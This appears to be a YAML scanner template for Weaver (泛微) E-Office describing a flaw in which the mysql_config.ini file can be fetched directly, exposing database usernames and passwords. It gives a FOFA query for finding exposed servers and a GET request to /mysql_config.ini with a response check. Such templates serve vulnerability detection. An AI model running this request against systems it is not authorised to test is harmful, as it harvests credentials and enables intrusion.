product: 泛微E-Office
vName: 泛微E-Office mysql_config.ini信息泄漏
type: 信息泄漏
vID: [ ]
level: 3
vDesc: 泛微 E-Office mysql_config.ini文件可直接访问，泄漏数据库账号密码等信息
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://www.cnblogs.com/pursue-security/p/17673633.html
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /mysql_config.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - datauser
            logic: and